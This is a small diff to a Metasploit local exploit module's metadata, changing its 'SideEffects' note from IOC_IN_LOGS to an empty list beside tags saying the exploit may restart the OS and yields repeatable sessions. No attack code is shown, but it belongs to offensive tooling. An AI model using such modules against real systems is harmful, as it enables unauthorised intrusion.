@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Local
           'Notes' => {
             'Stability' => [ CRASH_OS_RESTARTS, ],
             'Reliability' => [ REPEATABLE_SESSION, ],
-            'SideEffects' => [ IOC_IN_LOGS ]
+            'SideEffects' => [ ]
           },
           'Compat' => {
             'Meterpreter' => {
